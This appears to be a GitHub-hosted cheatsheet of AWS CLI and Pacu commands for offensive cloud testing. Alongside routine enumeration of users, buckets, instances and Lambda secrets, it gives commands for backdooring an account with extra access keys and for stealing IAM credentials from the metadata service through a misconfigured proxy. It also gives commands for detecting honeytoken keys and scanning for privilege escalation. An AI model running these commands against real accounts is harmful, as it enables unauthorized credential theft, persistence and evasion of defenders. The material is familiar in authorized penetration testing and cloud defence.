Skip to content

Latest commit

 

History

History
191 lines (126 loc) · 3.14 KB

AWS.md

File metadata and controls

191 lines (126 loc) · 3.14 KB
Raw

Amazon Web Services (AWS) CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Authentication

Set AWS programmatic keys for authentication (use --profile= for a new profile)

aws configure

Open S3 bucket enumeration

List the contents of an S3 bucket

aws s3 ls s3://<bucketname>/

Download contents of bucket

aws s3 sync s3://bucketname s3-files-dir

Account Information

Get basic account info

aws sts get-caller-identity

List IAM users

aws iam list-users

List IAM roles

aws iam list-roles

List S3 buckets accessible to an account

aws s3 ls

Virtual Machines

List EC2 instances

aws ec2 describe-instances

WebApps & SQL

List WebApps

aws deploy list-applications

List AWS RDS (SQL)

aws rds describe-db-instances --region <region name>

Knowing the VPC Security Group ID you can query the firewall rules to determine connectivity potential

aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>

Serverless

List Lambda Functions

aws lambda list-functions --region <region>

Look at environment variables set for secrets and analyze code

aws lambda get-function --function-name <lambda function>

Networking

List DirectConnect (VPN) connections

aws directconnect describe-connections

Backdoors

List access keys for a user

aws iam list-access-keys --user-name <username>

Backdoor account with second set of access keys

aws iam create-access-key --user-name <username>

Instance Metadata Service URL

http://169.254.169.254/latest/meta-data

Additional IAM creds possibly available here

http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>

Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS and misconfigured

curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo

IMDS Version 2 has some protections but these commands can be used to access it

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` 
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"

Other AWS Tools

WeirdAAL

https://github.com/carnal0wnage/weirdAAL

Run recon against all AWS services to enumerate access for a set of keys

python3 weirdAAL.py -m recon_all -t <name>

Pacu

AWS exploitation framework

https://github.com/RhinoSecurityLabs/pacu

Install Pacu

sudo apt-get install python3-pip
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
sudo bash install.sh

Import AWS keys for a specific profile

import_keys <profile name>

Detect if keys are honey token keys

run iam__detect_honeytokens

Enumerate account information and permissions

run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami

Check for privilege escalation

run iam__privesc_scan